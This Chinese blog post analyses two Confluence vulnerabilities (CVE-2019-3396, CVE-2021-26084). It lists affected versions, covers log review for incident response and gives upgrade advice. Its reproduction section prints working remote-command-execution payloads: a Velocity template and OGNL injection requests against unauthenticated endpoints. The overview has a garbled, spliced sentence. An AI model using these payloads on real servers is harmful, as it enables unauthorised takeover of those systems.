Confluence 漏洞分析排查

最新推荐文章于 2024-07-18 10:27:28 发布
最新推荐文章于 2024-07-18 10:27:28 发布
阅读量268 收藏
点赞数
分类专栏: 应急响应 渗透 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/youuzi/article/details/132272559
版权

目录

一、概述

二、影响版本

1、CVE-2019-3396

2、CVE-2021-26084

三、漏洞复现

CVE-2019-3396

2、CVE-2021-26084

四、应急响应

五、加固建议

一、概述

Confluence Server 和 Data Center 中的 Widget Connector 中存在服Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。

1、其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。

二、影响版本

1、CVE-2019-3396

  • version < 6.6.12
  • 6.7.0 <= version < 6.12.3
  • 6.13.0 <= version < 6.13.3
  • 6.14.0 <= version < 6.14.2

2、CVE-2021-26084

  • version < 6.13.23
  • 6.14.0 ≤ version < 7.4.11
  • 7.5.0 ≤ version < 7.11.5
  • 7.12.0 ≤ version < 7.12.5

三、漏洞复现

CVE-2019-3396

1、网上利用的脚本很多,我这里就贴部分利用脚本

可参考:

Confluence CVE-2019-3396 & CVE-2021-26084漏洞分析 - 先知社区

(1)控制vm模板中的内容造成模板注入

rce.vm 内容如下:
#set ($exp="exp")
#set ($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($command))
#set ($input=$exp.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $exp.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($exp.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
    $scan.next()
#end

这里使用ftp协议,python -m pyftpdlib -p 8888

2、CVE-2021-26084

利用方式可参考:https://www.ddosi.org/cve-2021-26084/

## 漏洞利用

有多个接口可以触发这个OGNL表达式注入漏洞。

### /pages/doenterpagevariables.action

这个接口不需要登录即可利用,发送如下数据包,即可看到`233*233`已被执行:

```
POST /pages/doenterpagevariables.action HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027
```



执行任意命令:

```
queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027
```



### /pages/createpage-entervariables.action

这个路径也不需要用户登录:

```
POST /pages/createpage-entervariables.action HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027
```

### /pages/createpage.action

这个接口需要一个可以创建页面的用户权限:

```
GET /pages/createpage.action?spaceKey=EX&amp;src=quick-create&amp;queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027 HTTP/1.1
Host: 192.168.1.162:8090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.162:8090/template/custom/content-editor.vm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: JSESSIONID=7B35600F54A9E303CE8C277ED960E1E7; seraph.confluence=524289%3A2ac32a308478b9cb9f0e351a12470faa4f2a928a
Connection: close

四、应急响应

1、日志侧排查

(1)找到 Confluence 的日志文件
这部分内容对 Confluence 的默认日志表现进行描述并且假设你没有对 Confluence 的默认日志配置进行修改。为了统一在不同平台中的日志输出,Confluence 使用 atlassian-confluence.log 为主要日志,而不使用应用服务器日志。

  • 当你启动 Confluence 的时候,日志实体将会发送日志直到 Confluence 完全初始化完成。任何在服务器控制台中输出的日志也会同时输出到上面描述的文件中。
  • 当启动完成后,所有的日志将会输出到 /logs/atlassian-confluence.log。例如: c:/confluence/data/logs/atlassian-confluence.log。

请注意,默认的位置位于 Confluence 的 home 目录中(home directory)而不是在应用服务器的日志目录中的。home 目录的路径可以在 /confluence/WEB-INF/classes/confluence-init.properties 中指定。

(2)找到 Confluence 的日志配置文件
有关 Confluence 和 Synchrony 的日志表现定义在下面的属性文件:
/confluence/WEB-INF/classes/log4j.properties

这个文件是标准的 Logj 配置文件,请参考 Apache log4j documentation 页面中的描述。

五、加固建议

1、升级到安全版本

2、如无必要,禁止开放到公网

 

dayouziei
关注
专栏目录
Atlassian confluence漏洞分析合集
不忘初心,护天下安全!
06-22 470
Atlassian Confluence Server是澳大利亚Atlassian公司的一套协同软件服务器版本,具有企业知识管理功能,并支持用于构建企业WiKi。Atlassian Confluence Data Center 是 Atlassian Confluence 的数据中心版本。Confluence是一个专业的企业知识管理与协同软件,常用于构建企业wiki。 利用该漏洞可以读取服务器上任意文件6.1.0 ...
Atlassian Confluence 任意文件读取
HxXh
07-13 1791
Atlassian Confluence 任意文件读取Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。该软件可实现团队成员之间的协作和知识共享。Atlassian Confluence 5.8.17之前版本中存在安全漏洞源于spaces/viewdefaultdecorator.action和admin/vi...
Confluence 文件读取漏洞复现(CVE-2019-3394)
黑白的博客
12-06 1589
声明 好好学习,天天向上 漏洞描述 Atlassian Confluence是企业广泛使用的wiki系统 Confluence Server 和 Data Center 在页面导出功能中存在本地文件泄露漏洞:具有“添加页面”空间权限的远程攻击者,能够读取 /confluence/WEB-INF/ 目录下的任意文件。 该目录可能包含用于与其他服务集成的配置文件,可能会泄漏认证凭据,例如 LDAP 认证凭据或其他敏感信息。 影响范围 6.1.0 <= version < 6.6.16 6.7.0 &
confluence注入漏洞
zzf9347的博客
03-18 402
Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。经过查找资料发现,这是confluence的一个漏洞,名称叫做注入漏洞,编号:CVE-2021-26084。这台confluence应用的访问是用nginx做的反向代理,没法直接访问,也没有直接开放访问端口。排查nginx代理服务器的访问日志,发现有几个异常ip访问了。重启后,继续观察,发现再有相关路径的访问全部被拦截。
CVE-2022-26134 Confluence远程命令执行漏洞复现
weixin_48421613的博客
06-05 6452
CVE-2022-26134 Confluence远程命令执行漏洞复现
漏洞复现】CVE-2022-26134 Atlassian Confluence_远程代码执行
m0_53121608的博客
07-13 201
漏洞复现】CVE-2022-26134 Atlassian Confluence_远程代码执行
mysql漏洞如何打补丁_漏洞治理(漏洞情报)调研报告
weixin_39851457的博客
11-23 1460
君哥有话说漏洞运营和安全资产运营是快速收敛攻击面的最有效的两个措施,需要企业安全建设负责人首要关注,并投入大量精力确保漏洞管理的各项细节落地,包括漏洞发现、漏洞推修、漏洞验证等各个环节,这里面的细节很多,比如覆盖率、漏扫范围、漏扫技术细节(未登陆扫描、被动式扫描)、漏扫类别、漏洞修复方式、不能修的漏洞补偿性措施、漏洞考核、避免历史漏洞重现等等。推荐泉哥的一本书《漏洞战争:软件漏洞分析精要...
Centos7系统安全漏洞及修复方案
热门推荐
sara的博客
04-20 2万+
以下所有漏洞均为Centos7的系统漏洞修复,为离线内网环境;某些服务由Docker镜像部署。 1、Docker Remote API 未授权访问漏洞【原理扫描】 详细描述 Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。 Docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集.
S2-062 远程命令执行漏洞复现(cve-2021-31805)
box
04-19 7514
S2-062 远程命令执行(cve-2021-31805) 0x00 漏洞描述 该漏洞由于对CVE-2020-17530的修复不完整造成的,CVE-2020-17530漏洞是由于Struts2 会对某些标签属性(比如id) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 其中x 的值用户可控时,用户再传入一个 %{payload} 即可造成OGNL表达式执行。在CVE-2021-31805漏洞中,仍然存在部分标签属性会造成攻击者恶意构造的OGNL表达式执行,导致远程代码执行。 0x01
记录一次centos被挖矿病毒感染的经历
fengwuxichen的博客
04-26 1万+
公司测试环境一台虚拟机被挖矿病毒感染,CPU持续飚高。感染原因应该是redis没有设置密码导致的。记录一下临时处理记录。 安装busybox 由于系统中的链接库、依赖可能已经被病毒篡改,如果需要仔细排查的话要先安装busybox,不然直接使用ps或者top是可能看不到病毒的,我这边是直接拉起一个busybox的docker容器,把busybox从容器中复制出来,放到中毒机器的/usr/bin下面。...
漏洞复现】CVE-2024-21683:Confluence远程代码执行漏洞
最新发布
网络安全从业者的学习笔记
07-18 912
Atlassian Confluence 是一款功能强大的企业协作软件,专为团队协作、知识管理和内容共享而设计。它提供了一个集中的平台,团队可以共同创建、编辑和共享文档、会议记录、项目计划以及技术文档。经过管理员身份验证的远程威胁者可构造恶意请求,利用该漏洞在受影响的实例上执行任意代码,而无需用户交互。
【高危】Atlassian Confluence 远程代码执行漏洞
murphysec的博客
07-25 506
Confluence 是由 Atlassian 开发的知识管理与协同软件,通常在企业内部用作wiki系统。Confluence 7.19.8到8.2.0之前的版本中存在远程代码执行漏洞,具有登录权限的攻击者无需用户交互即可在 Confluence 服务器中执行任意命令。
Atlassian Confluence 路径遍历和命令执行漏洞 (CVE-2019-3396)
weixin_56537388的博客
11-23 301
Confluence 是由澳大利亚软件公司 Atlassian 开发的基于 Web 的企业 wiki。Atlassian Confluence 6.14.2 版本之前存在一个未经授权的目录遍历漏洞,攻击者可以使用 Velocity 模板注入读取任意文件或执行任意命令。
Atlassian Confluence OGNL表达式注入命令执行漏洞(CVE-2021-26084)漏洞复现
m0_64366018的博客
01-16 629
Confluence Data Center上存在一个注入漏洞漏洞编号为CVE-2021-26084。该漏洞允许经过身份验证或在某些情况下未授权的攻击者,在Confluence Server或Confluence Data Center上执行任意代码。
详述近期遭利用的 Atlassian Confluence OGNL 注入漏洞 (CVE-2021-26084)
smellycat000的专栏
10-14 2422
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士趋势科技公司的研究团队详述了CVE-2021-26084 的根因。Atlassian Confluence Server and Dat...
漏洞复现|(CVE-2019-3396)Confluence文件读取&远程命令执行
weixin_42282189的博客
10-22 1209
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 1、漏洞简介 Confluence是一个专业的企业知识管理与协同软件,常用于构建企业wiki。它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。Confluence Server 与 Confluence Data Center 中的 Widget Connector 存在服务端模板注入漏洞,攻击者构造特定请求可远程遍历服务器任意文件,进而可以包含恶意文件来执行代码.
[翻译]盲SSRF利用链术语表
ZL_1618的博客
07-20 579
SSRF(Server-Side Request Forgery:服务请求伪造)是一种由攻击者构造,从而让服务端发起请求的一种安全漏洞,它将一个可以发起网络请求的服务当作跳板来攻击其他服务,SSRF的攻击目标一般是内网。当服务端提供了从其他服务器获取数据的功能(如:从指定URL地址获取网页文本内容、加载指定地址的图片、下载等),但是没有对目标地址做过滤与限制时就会出现SSRF。
Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)
qq_45391176的博客
11-09 293
CVE-2019-3396 利用vulhub复现过程
CVE-2019-3396 Confluence RCE漏洞简单粗暴复现
qq_42886216的博客
09-29 1285
CVE-2019-3396 Confluence RCE漏洞简单粗暴复现 1,前言 网上也有很多关于该漏洞的说明和复现,不再做过多阐述,在复现该漏洞时踩了一些坑,然后发现了一个快速复现的方法,所以本篇文章介绍的是如何简单快速地复现该漏洞。 2.漏洞复现过程简述 (1)rm文件 需求:需要远程包含一个后缀是.rm的文件,文件内容如下 #set ($e="exp") #set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime
Confluence漏洞
07-28
Confluence漏洞是指在Confluence Server或Data Center的特定版本中存在的安全漏洞,攻击者可以通过构造恶意数据执行OGNL表达式进行注入攻击,最终控制服务器。\[1\]受影响的版本包括Confluence Server & Confluence Data Center < 6.13.23、6.13.23 < Confluence Server & Confluence Data Center < 7.11.6、7.11.6 < Confluence Server & Confluence Data Center < 7.12.5、7.12.5 < Confluence Server & Confluence Data Center < 7.4.11。\[1\]具体的漏洞复现和影响范围可以参考Atlassian官方的安全公告链接:https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215。\[3\] #### 引用[.reference_title] - *1* [confluence的几个高危漏洞复现](https://blog.csdn.net/xiayu729100940/article/details/128197797)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Confluence CVE-2021-26084远程代码执行漏洞复现](https://blog.csdn.net/weixin_39997829/article/details/120179000)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值